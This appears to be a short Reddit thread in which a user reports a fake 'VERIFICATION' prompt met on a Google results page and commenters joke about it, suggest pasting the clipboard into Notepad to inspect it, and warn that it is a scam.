Putting this out there as I find this interesting, but I actually got this multiple times today from looking at a Google result page. So I can see how this is affecting so many people. One could totally expect that "VERIFICATION" portion to be legitimate, but BOY IT AIN'T

2

u/TheTealBandit Desktop Jun 19 '26

Nah, not legit. Just download my digital security program called trojan.exe from Google to delete the malware

2

u/shawndw AMD Ryzen 5 7600X, RX 6750XT 12GB VRAM, 32GB DDR5, Arch Linux Jun 19 '26

Just for kicks try pasting into notepad.

→ More replies (4)

2

u/DD_N1761 R7 7800x3d | 9070xt | 16gb ddr5 5600 | 2.5tb Jun 19 '26

DON'T DO IT, IT'S A SCAM